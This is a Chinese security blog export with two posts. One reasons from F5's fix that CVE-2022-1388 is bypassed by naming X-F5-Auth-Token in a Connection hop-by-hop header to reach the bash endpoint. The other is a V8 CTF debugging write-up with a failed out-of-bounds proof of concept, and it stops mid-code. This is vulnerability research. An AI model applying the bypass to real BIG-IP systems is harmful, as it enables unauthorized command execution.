SilverNeedleLab

BIG-IP(CVE-2022-1388)从修复方案分析出exp

Mon, 09 May 2022 19:06:00 +0800

原创 Jayway 2022-05-09 19:06 瑞典

从官方修复方案步步推测分析攻击payload。

1 漏洞详情

根据官方漏洞通报，BIG-IP iControl REST接口存在一个认证漏洞，绕过认证后可调用后端接口执行任意命令，影响版本较广，参考：

https://support.f5.com/csp/article/K23605346

上一个漏洞CVE-2021-22986影响的接口也是 iControl REST接口，推测CVE-2022-1388是针对此漏洞修复的绕过，CVE-2021-22986的payload如下：

2 修复方案分析

攻击poc/exp暂未公开，尝试下手分析一波，由于BIG-IP源码未公开，因此无法通过diff新旧代码定位漏洞触发点，唯一的线索只有官方给出的手动修复方案：

修复方式里建议对配置文件进行修改，包含三个判断逻辑，即对Connection这个header头进行set设置，查一下RFC官方文档对set方法的约定：

https://httpd.apache.org/docs/current/mod/mod_headers.html#requestheader

根据文档，set方法的作用为，假使发现请求头里存在foo：a，则set foo b会将header值变为：foo：b，修复方案是对Connection这个头进重新赋值，到这基本可以确定漏洞绕过点就存在于Connection请求头中。

所以问题来了，和Connection头有关的漏洞有哪些？

1) HTTP request smuggling

HTTP请求走私漏洞，和持久化连接相关，根因为管道化连接pipeline，HTTP规范提供了两种不同的方法来指定请求的结束位置（Content-Length/Transfer-Encoding）,因此判断和此漏洞无关。

2) hop-by-hop headers abuse

逐跳（hop-by-hop）请求头滥用是个较为生僻的漏洞，关于此漏洞可参考文章：

https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers

按解析方式，http请求头有两种，逐跳请求头和端对端请求头，参考：

https://datatracker.ietf.org/doc/html/rfc2616#section-13.5.1

顾名思义，逐跳的意思为，当在请求中遇到这些header头时，每一跳的代理（proxy）应该对这些header进行处理，而不将它们转发到下一跳。

如我们的请求中带有header头：Connection: close, X-Foo, X-Bar，原始请求在转发到代理时，逐跳处理则会将X-Foo和 X-Bar从原始请求中删除。

利用逐跳请求头的这种特性，可以实现删除任意已有header：

原作者提出了多种利用思路，包括：删除XFF头隐藏IP、缓存中毒DoS、SSRF、绕过WAF等。

3）历史CVE分析

根据关键字搜了一下，hop-by-hop headers abuse在几个漏洞中有利用，比如CVE-2021-32813：

header头被删除导致的权限提升，再看下漏洞的修复方案：

https://github.com/traefik/traefik/pull/8319/commits/cbaf86a93014a969b8accf39301932c17d0d73f9

熟悉的Header.set操作，删除Connection头中列举的hop-by-hop头。

又如下面的例子，将包含关键鉴权信息的header添加到Connection中以完成权限绕过：

到此几乎可以确定，CVE-2022-1388就是使用Connection头中包含hop-by-hop头来绕过鉴权。

3 漏洞复现

环境搭建，下载F5官网BIG-IP虚拟镜像安装：

访问web登录页，构造payload验证上述推断：

这里先回顾下CVE-2021-22986，思路为先通过/mgmt/shared/authn/login 接口的SSRF漏洞获取到凭证X-F5-Auth-Token头，然后访问/mgmt/tm/util/bash接口执行任意命令：

而CVE-2022-1388的区别在于，不必获取这个X-F5-Auth-Token头，而是将Connection头设置为畸形的hop-by-hop头，即Connection: Keep-alive,X-F5-Auth-Token，BIG-IP的鉴权过程发生在frontend，在后续转发到Jetty时会将此header删除，从而绕过鉴权：

至于BIG-IP后端具体的处理逻辑，还需要深入代码层分析，这里留个坑。本文也主要是提供一个从修复方案到复现oday/1day漏洞的推断和分析思路。

阅读原文

跳转微信打开

从一道CTF浅尝V8源码

Mon, 11 Apr 2022 19:42:00 +0800

bigric3 2022-04-11 19:42

作为刚接触浏览器安全的初学者，我选择了从CTF来入手浏览器的漏洞模式和利用姿势，最近看了若干历史的CTF浏

正文

作为刚接触浏览器安全的初学者，我个人选择了从CTF来入手浏览器的漏洞模式和利用姿势，最近看了若干历史的浏览器类题目，印象比较深的是GoogleCTF的题目Pwn just in time，另一个是34C3 CTF的V9，分别涵盖了V8 TurboFan中的两个优化阶段TyperLowering和RedundancyElimination，由于某些错误导致的CheckBounds和CheckMap守卫分别被优化而造成的数组越界和类型混淆问题。这里分享一篇个人调试Pwn just in time的记录，后续有时间再整理另一篇34C3 CTF的V9的调试记录，涉及另一部分优化代码和漏洞模式。这篇也是笔者第一次阅读调试V8代码，虽然查阅了许多资料，但肯定有理解不足或错误的地方还请包涵指正。

Pwn Just-In-Time

题目链接：
https://ctftime.org/task/6982
https://github.com/google/google-ctf/tree/master/2018/finals/pwn-just-in-time/

题目给出了两个patch文件，分别关闭了浏览器的sandbox和引入一个优化阶段的漏洞。

环境搭建

调试环境选择了在Visual Studio下，因为我觉得第一次调试肯定会是不断查看各种对象和结构体信息的过程。如下编译windows下的debug版本V8

 1F:\Research\chrome2\v8\v8 (HEAD detached at e0a58f8)
 2λ git reset --hard 7.0.276.3
 3
 4F:\Research\chrome2\v8\v8 (HEAD detached at e0a58f8)
 5λ git apply src\out\default\poc\addition-reducer.patch
 6
 7F:\Research\chrome2\v8\v8 (HEAD detached at e0a58f8)
 8λ cd src\
 9
10F:\Research\chrome2\v8\v8\src (HEAD detached at e0a58f8)
11λ gn gen --ide=vs2017 out\default --args="is_debug = true target_cpu = \"x64\" v8_enable_backtrace = true v8_untrusted_code_mitigations = false is_component_build = true"

补丁分析

看一下题目给的补丁

 1--- a/src/compiler/pipeline.cc
 2+++ b/src/compiler/pipeline.cc
 3@@ -1301,6 +1302,8 @@ struct TypedLoweringPhase {
 4                                data->jsgraph()->Dead());
 5     DeadCodeElimination dead_code_elimination(&graph_reducer, data->graph(),
 6                                               data->common(), temp_zone);
 7+    DuplicateAdditionReducer duplicate_addition_reducer(&graph_reducer, data->graph(),
 8+                                              data->common());
 9
10@@ -1318,6 +1321,7 @@ struct TypedLoweringPhase {
11                                          data->js_heap_broker(), data->common(),
12                                          data->machine(), temp_zone);
13     AddReducer(data, &graph_reducer, &dead_code_elimination);
14+    AddReducer(data, &graph_reducer, &duplicate_addition_reducer);

在TyperLowering中增加了一个新的裁剪器DuplicateAdditionReducer，我对补丁中做了一些注释信息：

 1--- /dev/null
 2+++ b/src/compiler/duplicate-addition-reducer.cc
 3
 4+Reduction DuplicateAdditionReducer::Reduce(Node* node) {
 5+  switch (node->opcode()) {
 6     // 遍历到IrOpcode为kNumberAdd的node
 7+    case IrOpcode::kNumberAdd:
 8+      return ReduceAddition(node);
 9+    default:
10+      return NoChange();
11+  }
12+}
13
14+Reduction DuplicateAdditionReducer::ReduceAddition(Node* node) {
15    // 检查当前结点的控制、数据、管理 Input的个数
16+  DCHECK_EQ(node->op()->ControlInputCount(), 0);
17+  DCHECK_EQ(node->op()->EffectInputCount(), 0);
18+  DCHECK_EQ(node->op()->ValueInputCount(), 2);
19+
20    // 取出左结点，检查左结点的opcode是否也为kNumberAdd
21+  Node* left = NodeProperties::GetValueInput(node, 0);
22+  if (left->opcode() != node->opcode()) {
23+    return NoChange();
24+  }
25+
26    // 取出右结点，检查右结点的opcode是否为常数类型
27+  Node* right = NodeProperties::GetValueInput(node, 1);
28+  if (right->opcode() != IrOpcode::kNumberConstant) {
29+    return NoChange();
30+  }
31+
32    // 继续取出左结点的左右父节点，要求父右结点的opcode为常数
33+  Node* parent_left = NodeProperties::GetValueInput(left, 0);
34+  Node* parent_right = NodeProperties::GetValueInput(left, 1);
35+  if (parent_right->opcode() != IrOpcode::kNumberConstant) {
36+    return NoChange();
37+  }
38+
39    // 取出右结点、父右结点的常量const1、const2
40+  double const1 = OpParameter<double>(right->op());
41+  double const2 = OpParameter<double>(parent_right->op());
42    // 创建opcode为常量的，且值为const1 + const2，的新结点new_const
43+  Node* new_const = graph()->NewNode(common()->NumberConstant(const1+const2));
44+
45    // 替换当前node的右结点为new_const，左结点为父左结点
46+  NodeProperties::ReplaceValueInput(node, parent_left, 0);
47+  NodeProperties::ReplaceValueInput(node, new_const, 1);
48+
49+  return Changed(node);
50+}

根据补丁信息，是对sea of nodes中当前op为kNumberAdd的node，做了如下4种情况的判断（图片来自Introduction to TurboFan）：

当node通过了上述的4种条件的检查，则对状态4的图做如下优化

综上，其实是做了一种类似如下的优化

1n + const1 + const2 => n + (const1 + const2) => n + const3

看似是合法的加法结合顺序的调整，其实引入了浮点数IEEE754编码的精度丢失问题，最终导致了代码执行。

漏洞分析

在d8 shell执行如下代码，可以清晰的看到精度丢失的问题

 1d8> var x = Number.MAX_SAFE_INTEGER + 1
 2undefined
 3d8> x
 49007199254740992
 5d8> x + 1
 69007199254740992
 7d8> 9007199254740993 == 9007199254740992
 8true
 9d8> x + 2
109007199254740994
11d8> x + 3
129007199254740996
13d8> x + 4 
149007199254740996
15d8> x + 5
169007199254740996
17d8> x + 6
189007199254740998

IEEE-754编码浮点数精度丢失

IEEE-754编码图示

V8使用IEEE-754编码浮点数，这意味着一个数字只有低52bit是用来作为value编码，因此ieee-754的最大值为pow(2, 53) - 1 = 9007199254740991。比这个数值大将会导致精度丢失，如上面在d8 shell中执行的一致。

我们分析一下导致精度丢失的原因。64bit的IEEE-754包括1bit的sign符号位，11bit的exponent指数位，52bit的fraction尾数位。计算IEEE-754数值的value，遵循以下公式

 1// 对introduction to turbofan的公式略作一点修改
 2value = (-1)^sign * 2^(e) * fraction
 3e = 2^(exponent - bias)
 4bias = 1023 (for 64 bits doubles)
 5fraction = 2^-0 + bit51*2^-1 + .... bit0*2^-52
 6/***************************************************************
 7*  关于bias
 8*  参考https://yamm.finance/wiki/Exponent_bias.html
 9*  For a single-precision number, an exponent in the range −126 .. +127 is biased by adding 127 to exponent to get a value in the range 1 .. 254 (0 and 255 have special meanings).
10*  For a double-precision number, an exponent in the range −1022 .. +1023 is biased by adding 1023 to exponent to get a value in the range 1 .. 2046 (0 and 2047 have special meanings).
11*  For a quad-precision number, an exponent in the range −16382 .. +16383 is biased by adding 16383 to exponent to get a value in the range 1 .. 32766 (0 and 32767 have special meanings).
12***************************************************************/

遵循公式分别计算一下MAX_SAFE_INTEGER，+1，+2，三个数值的内存如下

 1d8> %DumpObjects(Number.MAX_SAFE_INTEGER, 10)
 2----- [ HEAP_NUMBER_TYPE : 0x10 ] -----
 30x00000b8fffc0ddd0    0x00001f5c50100559    MAP_TYPE    
 40x00000b8fffc0ddd8    0x433fffffffffffff    // e=1075
 5
 6d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 1, 10)
 7----- [ HEAP_NUMBER_TYPE : 0x10 ] -----
 80x00000b8fffc0aec0    0x00001f5c50100559    MAP_TYPE    
 90x00000b8fffc0aec8    0x4340000000000000    // e=1076
10
11d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 2, 10)
12----- [ HEAP_NUMBER_TYPE : 0x10 ] -----
130x00000b8fffc0de88    0x00001f5c50100559    MAP_TYPE    
140x00000b8fffc0de90    0x4340000000000001        // e=1076

最后计算value，可以使用网站(见参考3, 4, 5)计算如下算式

综上，IEEE-754编码存在精度丢失问题，不能表示9007199254740993等，所以存在本节开始的d8 shell中执行的问题。

题目漏洞

那么结合题目中给出的补丁，会存在如下图示bug

另外，新增的reducer不会更新改变的node的type，导致change后的node的type range仍为之前typer phase计算的(9007199254740992,9007199254740992)，而非reducer后导致的node的range实际为(9007199254740994,9007199254740994)。

从失败的POC分析V8源码

Add计算的结果9007199254740994比typer phase计算的range的最大值9007199254740992要大，下面的问题是怎么利用这个bug消除掉CheckBounds的检查？
可以通过typer phase计算的range和数组的length比较，恒为真来消除CheckBounds结点。

这一块踩了很多的坑，因为开始不了解V8里对象的内存存储结构，比如in-line out-of-line descriptor等，也不了解v8的优化规则，后续也是查阅了很多资料，才勉强构造出类似如下的，但还是失败的poc，透过分析这个失败的poc的原因，笔者记录一下"被迫"调试分析一波v8源码的过程

 1let opt_me = (x) => {
 2    let arr = new Array(1.1,1.2);
 3  let y = ( x==1 ) ? 9007199254740992 : 9007199254740991;
 4  y = y + 1 + 1；
 5  y = y - 9007199254740991; // max=1, actual max=3
 6  return arr[y];
 7}
 8
 9opt_me(0);
10%OptimizeFunctionOnNextCall(opt_me);
11let res = opt_me(1);
12print(res);

构造如上代码，开始笔者的想法是typer phase阶段计算出行5 y的range(1,1)，所以可以优化掉checkbounds，而因为typer lowering阶段引入的bug导致y实际是range(2,3)从而导致越界。
但实际执行最后print的结构都是1.2：(

（1）JIT入口代码浅析

最先引起我怀疑的是并没有执行到DuplicateAdditionReducer裁剪器。补丁中优化器的添加位置在src/compiler/pipeline.cc的1324行，位于struct TypedLoweringPhase{}中，由1981行的bool PipelineImpl::CreateGraph(){}调用。在整个CreateGraph函数中，会运行v8的多种phase

1GraphBuilderPhase
2InliningPhase
3EarlyGraphTrimmingPhase
4TyperPhase
5ConcurrentOptimizationPrepPhase
6CopyMetadataForConcurrentCompilePhase
7TypedLoweringPhase

继续向上梳理数据流，找到调用位置在880行

1PipelineCompilationJob::Status PipelineCompilationJob::PrepareJobImpl(Isolate* isolate)

继续向上src/compiler.cc

1// ----------------------------------------------------------------------------
2// Implementation of OptimizedCompilationJob
3
4CompilationJob::Status OptimizedCompilationJob::PrepareJob(Isolate* isolate)

再向上会发现存在多条调用路径，所以我们在OptimizedCompilationJob::PrepareJob下个断点看一下调用栈

上图中能看到的顶层函数是v8.dll!v8::internal::Runtime_CompileOptimized_NotConcurrent,大概意思是非并行执行编译优化的运行时函数。调用在类似如下的文件中

1// F:\Research\chrome2\v8\v8\src\runtime\runtime-compiler.cc #21
2RUNTIME_FUNCTION(Runtime_CompileLazy) {

从文件名大概猜到是JIT代码的文件，顺手搜了下还有那些compiler文件

回到runtime-compiler.cc，有如下运行时函数，有上面断点的入口函数Runtime_CompileOptimized_NotConcurrent

 1RUNTIME_FUNCTION(Runtime_CompileLazy) {
 2RUNTIME_FUNCTION(Runtime_CompileOptimized_Concurrent) {
 3RUNTIME_FUNCTION(Runtime_CompileOptimized_NotConcurrent) {
 4RUNTIME_FUNCTION(Runtime_EvictOptimizedCodeSlot) {
 5RUNTIME_FUNCTION(Runtime_InstantiateAsmJs) {
 6RUNTIME_FUNCTION(Runtime_NotifyStubFailure) {
 7RUNTIME_FUNCTION(Runtime_NotifyDeoptimized) {
 8RUNTIME_FUNCTION(Runtime_CompileForOnStackReplacement) {
 9RUNTIME_FUNCTION(Runtime_TryInstallOptimizedCode) {
10RUNTIME_FUNCTION(Runtime_ResolvePossiblyDirectEval) {

关于Runtime_CompileOptimized_NotConcurrent和Runtime_CompileOptimized_Concurrent笔者都有大概走读一遍，逻辑没有很大的区别。这里挑了Runtime_CompileOptimized_Concurrent记录一下走读分析

1RUNTIME_FUNCTION(Runtime_CompileOptimized_Concurrent) {
2-->
3     if (!Compiler::CompileOptimized(function, ConcurrencyMode::kConcurrent)) {
4         -->
5             if (!GetOptimizedCode(function, mode).ToHandle(&code)) {

跟入GetOptimizedCode

 1MaybeHandle GetOptimizedCode(Handle function,
 2                                   ConcurrencyMode mode,
 3                                   BailoutId osr_offset = BailoutId::None(),
 4                                   JavaScriptFrame* osr_frame = nullptr) {
 5  Isolate* isolate = function->GetIsolate();
 6  Handle shared(function->shared(), isolate);
 7
 8  // Make sure we clear the optimization marker on the function so that we
 9  // don't try to re-optimize.
10  if (function->HasOptimizationMarker()) {
11    function->ClearOptimizationMarker();
12  }
13
14  Handle cached_code;
15  // 尝试从缓存中获取优化过的代码
16  if (GetCodeFromOptimizedCodeCache(function, osr_offset)
17          .ToHandle(&cached_code)) {
18        // ....
19  }
20
21   // Reset profiler ticks, function is no longer considered hot.
22   // 应该是cache中没有优化过的代码，这里准备优化，并将当前function设置为不会在hot
23  DCHECK(shared->is_compiled());
24  function->feedback_vector()->set_profiler_ticks(0); 
25
26    /******************************************************************
27    * 下面一行代码，实例化job句柄
28    * NewCompilationJob最后返回的是
29    * return new PipelineCompilationJob(parse_info, shared, function);
30    ***   这个类继承自CompilationJob，其中比较重要的3个函数如下
31    ***   // Prepare the compile job. Must be called on the main thread.
32    ***      MUST_USE_RESULT Status PrepareJob();
33
34    ***   // Executes the compile job. Can be called on a background thread if
35    ***   // can_execute_on_background_thread() returns true.
36    ***      MUST_USE_RESULT Status ExecuteJob();
37
38    ***   // Finalizes the compile job. Must be called on the main thread.
39    ***      MUST_USE_RESULT Status FinalizeJob();
40    * 至此先不做过多跟踪，回到原函数继续分析
41    ******************************************************************/
42    std::unique_ptr job(
43        compiler::Pipeline::NewCompilationJob(function, has_script));
44
45    // 继续是如一些条件判断，终止turbofan的编译优化等等
46    // ....
47
48    // 如下代码中，根据Mode，区分执行GetOptimizedCodeLater 或 GetOptimizedCodeNow
49    // 
50    if (mode == ConcurrencyMode::kConcurrent) {
51    if (GetOptimizedCodeLater(job.get())) {
52      job.release();  // The background recompile job owns this now.
53
54      // Set the optimization marker and return a code object which checks it.
55      function->SetOptimizationMarker(OptimizationMarker::kInOptimizationQueue);
56      if (function->IsInterpreted()) {
57        return BUILTIN_CODE(isolate, InterpreterEntryTrampoline);
58      } else {
59        return BUILTIN_CODE(isolate, CheckOptimizationMarker);
60      }
61    }
62  } else {
63    if (GetOptimizedCodeNow(job.get())) return compilation_info->code();
64  }

继续跟读GetOptimizedCodeLater

 1// F:\Research\chrome2\v8\v8\src\compiler.cc #556
 2bool GetOptimizedCodeLater(CompilationJob* job) {
 3
 4      // ....
 5
 6      /******************************************************************
 7      *  下一行代码看到上面提及的PrepareJob()，针对继承CompilationJob的不同子类有不同实现，
 8      *  除了这里的jit实现了一个，还有在解释器interpreter.cc以及wasm编译器中也分别实现了一个，
 9      *  PrepareJob我理解为jit的第一阶段，其中会先根据一些编译选项设置turbo的编译flag，
10      ** 调用如下代码，设置pipelinedata
11      ** data_.set_start_source_position(
12      **        compilation_info()->shared_info()->start_position());
13      ** 继续初始化Linkage，linkage规定类似调用约定？接着调用核心函数如下
14      **      if (!pipeline_.CreateGraph()) {
15      ** 顾名思义，在CreateGraph中创建sea of nodes，这个阶段会调用的一些phase有：
16      *** GraphBuilderPhase // 创建图，具体实现的粗略走读见《introtuction to turbofan》
17      *** InliningPhase     // Perform function context specialization and inlining (if           ***                      enabled).
18      *** EarlyGraphTrimmingPhase // Remove dead->live edges from the graph.
19      *** 
20      *** // Type the graph and keep the Typer running on newly created nodes within
21          // this scope; the Typer is automatically unlinked from the Graph once we
22          // leave this scope below.
23      *** TyperPhase
24      *** TypedLoweringPhase // Lower JSOperators where we can determine types.
25
26      *** // Do some hacky things to prepare for the optimization phase.
27             (caching handles, etc.).
28      *** ConcurrentOptimizationPrepPhase 
29
30      ******************************************************************/
31      if (job->PrepareJob() != CompilationJob::SUCCEEDED) return false;
32
33
34      /******************************************************************
35      * 这里mode是并发的，所以如下一行新起了一个优化线程
36      * 调用栈：
37      ** isolate->optimizing_compile_dispatcher()->QueueForOptimization(job);
38      ** V8::GetCurrentPlatform()->CallOnBackgroundThread(
39             new CompileTask(isolate_, this), v8::Platform::kShortRunningTask);
40      ** OptimizingCompileDispatcher::CompileTask->run()
41      ** dispatcher_->CompileNext(dispatcher_->NextInput(true));
42      ** CompilationJob::Status status = job->ExecuteJob();
43      *
44      * 至此又看到了我们之前提及的ExecuteJob(),其中调用到的phase：
45      **  LoopPeelingPhase、LoopExitEliminationPhase、LoadEliminationPhase、
46      **  EscapeAnalysisPhase、SimplifiedLoweringPhase、UntyperPhase、
47      **  GenericLoweringPhase、EarlyOptimizationPhase、EffectControlLinearizationPhase、
48      **  DeadCodeEliminationPhase、StoreStoreEliminationPhase、
49      **  ControlFlowOptimizationPhase、MemoryOptimizationPhase、LateOptimizationPhase
50      *  
51      ******************************************************************/
52      isolate->optimizing_compile_dispatcher()->QueueForOptimization(job);
53
54      // ....

`（2）GraphBuilderPhase`

如上的代码走读，找到了构造sea of nodes的入口GraphBuilderPhase，位于PipelineImpl::CreateGraph()中第一个调用的phase，为TurboFan优化的入口phase，从其phase_name()和构造函数大概理解到其功能是将“上层”传入的bytecodes转换为sea of nodes的IR图

 1// src/compiler/pipeline.cc: 1138
 2struct GraphBuilderPhase {
 3  static const char* phase_name() { return "bytecode graph builder"; }
 4
 5  void Run(PipelineData* data, Zone* temp_zone) {
 6    JSTypeHintLowering::Flags flags = JSTypeHintLowering::kNoFlags;
 7    if (data->info()->is_bailout_on_uninitialized()) {
 8      flags |= JSTypeHintLowering::kBailoutOnUninitialized;
 9    }
10    BytecodeGraphBuilder graph_builder(
11        temp_zone, data->info()->shared_info(),
12        handle(data->info()->closure()->feedback_vector(), data->isolate()),
13        data->info()->osr_offset(), data->jsgraph(), CallFrequency(1.0f),
14        data->source_positions(), data->native_context(),
15        SourcePosition::kNotInlined, flags, true,
16        data->info()->is_analyze_environment_liveness());
17    graph_builder.CreateGraph();
18  }
19};

跟入graph_builder.CreateGraph()，SetStart和SetEnd分别设置Graph中的成员变量_start和_end，即为sea of nodes中的start 和 end结点，这个在后续的phase中会用到。这里生成start和end结点的参数一个是common()->Start(actual_parameter_count)（这个参数个数+4是哪几个内置参数我没去追代码了），另一个是common()->End(input_count), input_count, inputs，其中，这里的input_count表示了其父节点的个数，inputs表示其父节点的结构体

通过调试我们看到其父节点的opcode为return，正如sea of nodes所示

代码中间的VisitBytecodes()会循环遍历bytecode指令，调用对应的指令node生成函数，生成对应的node

 1// src\compiler\bytecode-graph-builder.cc: 577
 2void BytecodeGraphBuilder::CreateGraph() {
 3  SourcePositionTable::Scope pos_scope(source_positions_, start_position_);
 4
 5  // Set up the basic structure of the graph. Outputs for {Start} are the formal
 6  // parameters (including the receiver) plus new target, number of arguments,
 7  // context and closure.
 8  int actual_parameter_count = bytecode_array()->parameter_count() + 4;
 9  graph()->SetStart(graph()->NewNode(common()->Start(actual_parameter_count)));
10
11  Environment env(this, bytecode_array()->register_count(),
12                  bytecode_array()->parameter_count(),
13                  bytecode_array()->incoming_new_target_or_generator_register(),
14                  graph()->start());
15  set_environment(&env);
16
17  VisitBytecodes();
18
19  // Finish the basic structure of the graph.
20  DCHECK_NE(0u, exit_controls_.size());
21  int const input_count = static_cast<int>(exit_controls_.size());
22  Node** const inputs = &exit_controls_.front();
23  Node* end = graph()->NewNode(common()->End(input_count), input_count, inputs);
24  graph()->SetEnd(end);
25}

如下是poc中opt_me函数的bytecode

VisitBytecodes() -> VisitSingleBytecode() 会遍历每一条指令，并通过switch 宏来调用对应的生成node的函数，如这里遍历到第二条指令，会调用BytecodeGraphBuilder::VisitLdaGlobal()

 1// src\compiler\bytecode-graph-builder.cc: 979
 2void BytecodeGraphBuilder::VisitLdaGlobal() {
 3  PrepareEagerCheckpoint();
 4  Handle name(
 5      Name::cast(bytecode_iterator().GetConstantForIndexOperand(0)), isolate());
 6  uint32_t feedback_slot_index = bytecode_iterator().GetIndexOperand(1);
 7  Node* node =
 8      BuildLoadGlobal(name, feedback_slot_index, TypeofMode::NOT_INSIDE_TYPEOF);
 9  environment()->BindAccumulator(node, Environment::kAttachFrameState);
10}

此条指令处理后，会继续处理下一条指令，如此遍历bytecode生成对应node



至此，我们粗略的调试了一遍GraphBuilderPhase，对一些基本的结构有些了解。
（3）TyperPhase
经过这个Phase的优化，sea of nodes的结点便都有了Type & Range。代码看TyperPhase中只添加了一个reducer：Visitor
 1// src\compiler\typer.cc: 348
 2void Typer::Run(const NodeVector& roots,
 3                LoopVariableOptimizer* induction_vars) {
 4  if (induction_vars != nullptr) {
 5    induction_vars->ChangeToInductionVariablePhis();
 6  }
 7  Visitor visitor(this, induction_vars);
 8  GraphReducer graph_reducer(zone(), graph());
 9  graph_reducer.AddReducer(&visitor);
10  for (Node* const root : roots) graph_reducer.ReduceNode(root);
11  graph_reducer.ReduceGraph();
12
13  if (induction_vars != nullptr) {
14    induction_vars->ChangeToPhisAndInsertGuards();
15  }
16}
跟入Typer::Visitor::Reduce,一个switch结构，根据node的opcode调用不同的函数UpdateType()
 1  // src\compiler\typer.cc: 66
 2  Reduction Reduce(Node* node) override {
 3    if (node->op()->ValueOutputCount() == 0) return NoChange();
 4    switch (node->opcode()) {
 5#define DECLARE_CASE(x) \
 6  case IrOpcode::k##x:  \
 7    return UpdateType(node, TypeBinaryOp(node, x##Typer));
 8      JS_SIMPLE_BINOP_LIST(DECLARE_CASE)
 9#undef DECLARE_CASE
10
11#define DECLARE_CASE(x) \
12  case IrOpcode::k##x:  \
13
(3-1) SpeculativeNumberAdd node
跟踪下SpeculateNumberAdd结点的Typer处理，Typer::Visitor::Reduce行94处理
SIMPLIFIED_SPECULATIVE_NUMBER_BINOP_LIST(V)声明如下，宏展开即DECLARE_CASE(SpeculativeNumberAdd)
 1#define SIMPLIFIED_SPECULATIVE_NUMBER_BINOP_LIST(V) \
 2  V(SpeculativeNumberAdd)                           \
 3  V(SpeculativeNumberSubtract)                      \
 4  V(SpeculativeNumberMultiply)                      \
 5  V(SpeculativeNumberDivide)                        \
 6  V(SpeculativeNumberModulus)                       \
 7  V(SpeculativeNumberBitwiseAnd)                    \
 8  V(SpeculativeNumberBitwiseOr)                     \
 9  V(SpeculativeNumberBitwiseXor)                    \
10  V(SpeculativeNumberShiftLeft)                     \
11  V(SpeculativeNumberShiftRight)                    \
12  V(SpeculativeNumberShiftRightLogical)             \
13  V(SpeculativeSafeIntegerAdd)                      \
14  V(SpeculativeSafeIntegerSubtract)
根据上图中DECLARE_CASE的声明，会调用行92UpdateType。先进入TypeBinaryOp(node,x),条件成立最后调用f()
1// src\compiler\typer.cc: 393
2Type Typer::Visitor::TypeBinaryOp(Node* node, BinaryTyperFun f) {
3  Type left = Operand(node, 0);
4  Type right = Operand(node, 1);
5  return left.IsNone() || right.IsNone() ? Type::None()
6                                         : f(left, right, typer_);
7}
根据上下文，f即SpeculativeNumberAdd，但这里我并没有搜到SpeculativeNumberAdd函数的声明实现，并且调试单步跟入vs会跑丢提示找不到某些文件，所以这里查看f的函数地址，通过反汇编窗口找到代码如下
从反汇编大概可以看到call到v8::internal::compiler::OperationTyper::SpeculativeNumberAdd。直接在反汇编断点处查看源码，会发现落到src\compiler\typer.cc: 284
原来是通过宏定义的函数，根据宏展开，依旧是找不到SpeculativeNumberAdd。所以我们继续在反汇编窗口跟入call的地址，来到如下位置，这里我们就明白了，v8通过拼接的方式声明了SpeculativeNumberAdd
 1--- F:\Research\chrome2\v8\v8\src\compiler\operation-typer.cc ------------------
 2}
 3
 4#define SPECULATIVE_NUMBER_BINOP(Name)                         \
 5  Type OperationTyper::Speculative##Name(Type lhs, Type rhs) { \
 6    lhs = SpeculativeToNumber(lhs);                            \
 7    rhs = SpeculativeToNumber(rhs);                            \
 8    return Name(lhs, rhs);                                     \
 9  }
10SPECULATIVE_NUMBER_BINOP(NumberAdd)
1100007FFBA70C3CA0  sub         rsp,88h  
1200007FFBA70C3CA7  mov         rax,rdx  
1300007FFBA70C3CAA  mov         r10,qword ptr [__security_cookie (07FFBA886FE08h)]  
1400007FFBA70C3CB1  xor         r10,rsp  
1500007FFBA70C3CB4  mov         qword ptr [rsp+80h],r10  
1600007FFBA70C3CBC  mov         qword ptr [rsp+78h],r8  
1700007FFBA70C3CC1  mov         qword ptr [rsp+70h],r9  
1800007FFBA70C3CC6  mov         qword ptr [rsp+38h],rcx  
1900007FFBA70C3CCB  mov         rcx,qword ptr [rsp+38h]  
2000007FFBA70C3CD0  mov         r8,qword ptr [lhs]  
2100007FFBA70C3CD5  mov         qword ptr [rsp+60h],r8  
2200007FFBA70C3CDA  mov         r8,qword ptr [rsp+60h]  
2300007FFBA70C3CDF  mov         qword ptr [rsp+30h],rcx  
2400007FFBA70C3CE4  lea         r9,[rsp+68h]  
2500007FFBA70C3CE9  mov         qword ptr [rsp+28h],rdx  
2600007FFBA70C3CEE  mov         rdx,r9  
2700007FFBA70C3CF1  mov         qword ptr [rsp+20h],rax  
2800007FFBA70C3CF6  call        v8::internal::compiler::OperationTyper::SpeculativeToNumber (07FFBA70C7450h)  
2900007FFBA70C3CFB  mov         rax,qword ptr [rsp+68h]  
3000007FFBA70C3D00  mov         qword ptr [lhs],rax  
3100007FFBA70C3D05  mov         rax,qword ptr [rhs]  
3200007FFBA70C3D0A  mov         qword ptr [rsp+50h],rax  
3300007FFBA70C3D0F  mov         r8,qword ptr [rsp+50h]  
3400007FFBA70C3D14  mov         rcx,qword ptr [rsp+30h]  
3500007FFBA70C3D19  lea         rdx,[rsp+58h]  
3600007FFBA70C3D1E  call        v8::internal::compiler::OperationTyper::SpeculativeToNumber (07FFBA70C7450h)  
3700007FFBA70C3D23  mov         rax,qword ptr [rsp+58h]  
3800007FFBA70C3D28  mov         qword ptr [rhs],rax  
3900007FFBA70C3D2D  mov         rax,qword ptr [rhs]  
4000007FFBA70C3D32  mov         qword ptr [rsp+48h],rax
通过上面的代码，我们可以知道，SpeculativeNumberAdd继续调到了NumberAdd，根据如下代码行31调用AddRange()添加range
 1// src\compiler\operation-typer.cc: 578
 2Type OperationTyper::NumberAdd(Type lhs, Type rhs) {
 3  DCHECK(lhs.Is(Type::Number()));
 4  DCHECK(rhs.Is(Type::Number()));
 5
 6  if (lhs.IsNone() || rhs.IsNone()) return Type::None();
 7
 8  // Addition can return NaN if either input can be NaN or we try to compute
 9  // the sum of two infinities of opposite sign.
10  bool maybe_nan = lhs.Maybe(Type::NaN()) || rhs.Maybe(Type::NaN());
11
12  // Addition can yield minus zero only if both inputs can be minus zero.
13  bool maybe_minuszero = true;
14  if (lhs.Maybe(Type::MinusZero())) {
15    lhs = Type::Union(lhs, cache_.kSingletonZero, zone());
16  } else {
17    maybe_minuszero = false;
18  }
19  if (rhs.Maybe(Type::MinusZero())) {
20    rhs = Type::Union(rhs, cache_.kSingletonZero, zone());
21  } else {
22    maybe_minuszero = false;
23  }
24
25  // We can give more precise types for integers.
26  Type type = Type::None();
27  lhs = Type::Intersect(lhs, Type::PlainNumber(), zone());
28  rhs = Type::Intersect(rhs, Type::PlainNumber(), zone());
29  if (!lhs.IsNone() && !rhs.IsNone()) {
